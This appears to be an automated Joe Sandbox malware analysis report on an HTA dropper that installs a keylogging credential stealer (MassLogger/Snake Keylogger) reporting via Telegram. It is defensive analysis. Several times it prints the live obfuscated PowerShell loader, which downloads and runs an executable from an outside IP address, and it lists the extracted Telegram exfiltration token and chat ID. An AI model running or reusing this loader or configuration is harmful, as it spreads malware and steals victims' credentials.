Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
shegivenmekissinglips.hta

Overview

General Information

Sample name:shegivenmekissinglips.hta
Analysis ID:1664069
MD5:0cd3cfbcd6b83e757fe32b52478984ae
SHA1:cb75a95ece4782ca1ab27d1b47c89e2ce3262a55
SHA256:35b4e89bd4caed0364300af02f6d829e1cd587b308d01ff97cf202df06830f8c
Tags:htauser-abuse_ch
Infos:

Detection

Cobalt Strike, MSIL Logger, MassLogger RAT
Score:100
Range:0 - 100
Confidence:100%

Signatures

Detected Cobalt Strike Beacon
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected MSIL Logger
Yara detected MassLogger RAT
Yara detected Powershell decode and execute
Yara detected Telegram RAT
.NET source code references suspicious native API functions
Binary is likely a compiled AutoIt script file
Contains functionality to log keystrokes (.Net Source)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Suspicious MSHTA Child Process
Suspicious command line found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 6680 cmdline: mshta.exe "C:\Users\user\Desktop\shegivenmekissinglips.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 1232 cmdline: "C:\Windows\system32\cmd.exe" "/c pOWErsHelL.Exe -Ex bypASs -NOP -w 1 -c DEVICeCReDeNTiALdePloYmenT.eXE ; IeX($(iex('[sYSteM.tExt.eNcoDiNG]'+[CHAR]58+[cHAr]0x3A+'UTf8.geTsTRiNg([SYstem.cOnVeRt]'+[CHAR]0X3A+[cHaR]58+'fromBASe64sTrInG('+[CHar]0x22+'JGIySTFwOXZidlcxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTUJlUmRlZklOaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQVhVQkhZLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRU5aemdQLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcnNxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpLS3dOalVuc3gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJETFEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJDYUxKayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkYjJJMXA5dmJ2VzE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjcuMTgvMzQ2L2hrY21kLmV4ZSIsIiRlTlY6QVBQREFUQVxoa2NtZC5leGUiLDAsMCk7U1RBUnQtc2xlZVAoMyk7aW52T0tFLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXGhrY21kLmV4ZSI='+[cHar]0X22+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 516 cmdline: pOWErsHelL.Exe -Ex bypASs -NOP -w 1 -c DEVICeCReDeNTiALdePloYmenT.eXE ; IeX($(iex('[sYSteM.tExt.eNcoDiNG]'+[CHAR]58+[cHAr]0x3A+'UTf8.geTsTRiNg([SYstem.cOnVeRt]'+[CHAR]0X3A+[cHaR]58+'fromBASe64sTrInG('+[CHar]0x22+'JGIySTFwOXZidlcxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTUJlUmRlZklOaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQVhVQkhZLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRU5aemdQLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcnNxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpLS3dOalVuc3gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJETFEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJDYUxKayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkYjJJMXA5dmJ2VzE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjcuMTgvMzQ2L2hrY21kLmV4ZSIsIiRlTlY6QVBQREFUQVxoa2NtZC5leGUiLDAsMCk7U1RBUnQtc2xlZVAoMyk7aW52T0tFLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXGhrY21kLmV4ZSI='+[cHar]0X22+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 6512 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sgkiriu3\sgkiriu3.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 6488 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6A77.tmp" "c:\Users\user\AppData\Local\Temp\sgkiriu3\CSC38C97BC6FA854DE2B4DB5ADB17FE40F2.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • hkcmd.exe (PID: 7560 cmdline: "C:\Users\user\AppData\Roaming\hkcmd.exe" MD5: A9A05D451C24858918183C1E7271A306)
          • RegSvcs.exe (PID: 7604 cmdline: "C:\Users\user\AppData\Roaming\hkcmd.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
{"EXfil Mode": "Telegram", "Telegram Token": "7598843355:AAHehybWWiULdkPS1RLFstdr4_yw-SdkoII", "Telegram Chatid": "7668947425"}
SourceRuleDescriptionAuthorStrings
0000000D.00000002.2449579655.0000000000162000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    0000000D.00000002.2449579655.0000000000162000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000000D.00000002.2449579655.0000000000162000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
        0000000D.00000002.2449579655.0000000000162000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          0000000D.00000002.2449579655.0000000000162000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0xefdf:$a1: get_encryptedPassword
          • 0xf307:$a2: get_encryptedUsername
          • 0xed7a:$a3: get_timePasswordChanged
          • 0xee9b:$a4: get_passwordField
          • 0xeff5:$a5: set_encryptedPassword
          • 0x10951:$a7: get_logins
          • 0x10602:$a8: GetOutlookPasswords
          • 0x103f4:$a9: StartKeylogger
          • 0x108a1:$a10: KeyLoggerEventArgs
          • 0x10451:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 17 entries
          SourceRuleDescriptionAuthorStrings
          13.2.RegSvcs.exe.160000.0.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            13.2.RegSvcs.exe.160000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              13.2.RegSvcs.exe.160000.0.unpackJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
                13.2.RegSvcs.exe.160000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  13.2.RegSvcs.exe.160000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0xf1df:$a1: get_encryptedPassword
                  • 0xf507:$a2: get_encryptedUsername
                  • 0xef7a:$a3: get_timePasswordChanged
                  • 0xf09b:$a4: get_passwordField
                  • 0xf1f5:$a5: set_encryptedPassword
                  • 0x10b51:$a7: get_logins
                  • 0x10802:$a8: GetOutlookPasswords
                  • 0x105f4:$a9: StartKeylogger
                  • 0x10aa1:$a10: KeyLoggerEventArgs
                  • 0x10651:$a11: KeyLoggerEventArgsEventHandler
                  Click to see the 13 entries
                  SourceRuleDescriptionAuthorStrings
                  amsi32_516.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                    System Summary

                    barindex
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/c pOWErsHelL.Exe -Ex bypASs -NOP -w 1 -c DEVICeCReDeNTiALdePloYmenT.eXE ; IeX($(iex('[sYSteM.tExt.eNcoDiNG]'+[CHAR]58+[cHAr]0x3A+'UTf8.geTsTRiNg([SYstem.cOnVeRt]'+[CHAR]0X3A+[cHaR]58+'fromBASe64sTrInG('+[CHar]0x22+'JGIySTFwOXZidlcxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTUJlUmRlZklOaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQVhVQkhZLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRU5aemdQLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcnNxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpLS3dOalVuc3gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJETFEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJDYUxKayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkYjJJMXA5dmJ2VzE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjcuMTgvMzQ2L2hrY21kLmV4ZSIsIiRlTlY6QVBQREFUQVxoa2NtZC5leGUiLDAsMCk7U1RBUnQtc2xlZVAoMyk7aW52T0tFLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXGhrY21kLmV4ZSI='+[cHar]0X22+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/c pOWErsHelL.Exe -Ex bypASs -NOP -w 1 -c DEVICeCReDeNTiALdePloYmenT.eXE ; IeX($(iex('[sYSteM.tExt.eNcoDiNG]'+[CHAR]58+[cHAr]0x3A+'UTf8.geTsTRiNg([SYstem.cOnVeRt]'+[CHAR]0X3A+[cHaR]58+'fromBASe64sTrInG('+[CHar]0x22+'JGIySTFwOXZidlcxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTUJlUmRlZklOaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQVhVQkhZLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRU5aemdQLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcnNxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpLS3dOalVuc3gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJETFEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJDYUxKayA
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sgkiriu3\sgkiriu3.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sgkiriu3\sgkiriu3.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: pOWErsHelL.Exe -Ex bypASs -NOP -w 1 -c DEVICeCReDeNTiALdePloYmenT.eXE ; IeX($(iex('[sYSteM.tExt.eNcoDiNG]'+[CHAR]58+[cHAr]0x3A+'UTf8.geTsTRiNg([SYstem.cOnVeRt]'+[CHAR]0X3A+[cHaR]58+'fromBASe64sTrInG('+[CHar]0x22+'JGIySTFwOXZidlcxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTUJlUmRlZklOaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQVhVQkhZLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRU5aemdQLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcnNxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpLS3dOalVuc3gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJETFEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJDYUxKayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkYjJJMXA5dmJ2VzE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjcuMTgvMzQ2L2hrY21kLmV4ZSIsIiRlTlY6QVBQREFUQVxoa2NtZC5leGUiLDAsMCk7U1RBUnQtc2xlZVAoMyk7aW52T0tFLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXGhrY21kLmV4ZSI='+[cHar]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 516, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sgkiriu3\sgkiriu3.cmdline", ProcessId: 6512, ProcessName: csc.exe
                    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 516, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\hkcmd[1].exe
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 516, TargetFilename: C:\Users\user\AppData\Local\Temp\sgkiriu3\sgkiriu3.cmdline
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: pOWErsHelL.Exe -Ex bypASs -NOP -w 1 -c DEVICeCReDeNTiALdePloYmenT.eXE ; IeX($(iex('[sYSteM.tExt.eNcoDiNG]'+[CHAR]58+[cHAr]0x3A+'UTf8.geTsTRiNg([SYstem.cOnVeRt]'+[CHAR]0X3A+[cHaR]58+'fromBASe64sTrInG('+[CHar]0x22+'JGIySTFwOXZidlcxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTUJlUmRlZklOaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQVhVQkhZLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRU5aemdQLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcnNxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpLS3dOalVuc3gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJETFEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJDYUxKayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkYjJJMXA5dmJ2VzE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjcuMTgvMzQ2L2hrY21kLmV4ZSIsIiRlTlY6QVBQREFUQVxoa2NtZC5leGUiLDAsMCk7U1RBUnQtc2xlZVAoMyk7aW52T0tFLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXGhrY21kLmV4ZSI='+[cHar]0X22+'))')))", CommandLine: pOWErsHelL.Exe -Ex bypASs -NOP -w 1 -c DEVICeCReDeNTiALdePloYmenT.eXE ; IeX($(iex('[sYSteM.tExt.eNcoDiNG]'+[CHAR]58+[cHAr]0x3A+'UTf8.geTsTRiNg([SYstem.cOnVeRt]'+[CHAR]0X3A+[cHaR]58+'fromBASe64sTrInG('+[CHar]0x22+'JGIySTFwOXZidlcxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTUJlUmRlZklOaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQVhVQkhZLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRU5aemdQLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcnNxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpLS3dOalVuc3gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJETFEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJDYUxKayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICA

                    Data Obfuscation

                    barindex
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sgkiriu3\sgkiriu3.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sgkiriu3\sgkiriu3.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: pOWErsHelL.Exe -Ex bypASs -NOP -w 1 -c DEVICeCReDeNTiALdePloYmenT.eXE ; IeX($(iex('[sYSteM.tExt.eNcoDiNG]'+[CHAR]58+[cHAr]0x3A+'UTf8.geTsTRiNg([SYstem.cOnVeRt]'+[CHAR]0X3A+[cHaR]58+'fromBASe64sTrInG('+[CHar]0x22+'JGIySTFwOXZidlcxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTUJlUmRlZklOaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQVhVQkhZLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRU5aemdQLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcnNxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpLS3dOalVuc3gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJETFEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJDYUxKayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkYjJJMXA5dmJ2VzE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjcuMTgvMzQ2L2hrY21kLmV4ZSIsIiRlTlY6QVBQREFUQVxoa2NtZC5leGUiLDAsMCk7U1RBUnQtc2xlZVAoMyk7aW52T0tFLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXGhrY21kLmV4ZSI='+[cHar]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 516, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sgkiriu3\sgkiriu3.cmdline", ProcessId: 6512, ProcessName: csc.exe
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-04-13T11:58:33.097543+020020220501A Network Trojan was detected104.168.7.1880192.168.2.449716TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
